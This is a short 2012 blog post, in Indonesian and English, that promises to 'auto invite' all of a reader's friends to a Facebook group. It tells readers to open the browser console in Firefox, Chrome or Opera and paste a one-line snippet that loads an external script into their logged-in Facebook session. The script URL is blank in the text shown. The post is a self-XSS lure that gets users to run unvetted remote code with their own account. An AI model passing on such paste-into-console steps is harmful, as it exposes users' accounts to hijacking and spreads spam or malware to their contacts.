Selasa, 09 Oktober 2012

Auto Invite Group Facebook

Anda ingin group facebook anda beranggotakan ribuan orang bahkan jutaan.


Untuk Browser Mozilla Firefox
1. Pertama anda harus berada di sini >
2. Tekan CTRL + SHIFT + K
3. Copy paste kode berikut kedalam jendela yang muncul document.body.appendChild(document.createElement('script')).src='';
4. Lalu tekan enter, lalu tunggu sebentar dan semua teman sudah di undang.

 Untuk Browser Chrome
1. Pertama anda harus berada di sini >
2. Klik Kanan Mouse
3. Pilih Inspect Element and Console
4. Copy paste kode berikut kedalam jendela yang muncul document.body.appendChild(document.createElement('script')).src='';
5. Lalu tekan enter, lalu tunggu sebentar dan semua teman sudah di undang. _____________________________________

 Help us by Inviting your Friends to this Group !!
*Mozilla Firefox : (View Screenshot --> )
1. First you should be here first
 2. Press CTRL + SHIFT + K 3. COPY the following code: document.body.appendChild(document.createElement('script')).src='';
4. Paste into the Console Box.
5. Then press Enter, Good luck .. :)

*Google Chrome : (View Screenshot --> )
1. First you should be here first
2. Right Click, Inspect Element
3. Select the Console tab
4. COPY the following code: document.body.appendChild(document.createElement('script')).src='';
5. Paste into the Console Box.
6. Then press Enter, Good luck .. :)

*Opera : (View Screenshot --> )
1. First you should be here first
2. Right Click, Inspect Element
3. Select the Console tab
4. COPY the following code: document.body.appendChild(document.createElement('script')).src='';
5. Paste into the Console Box.
6. Then press Enter, Good luck .. :)

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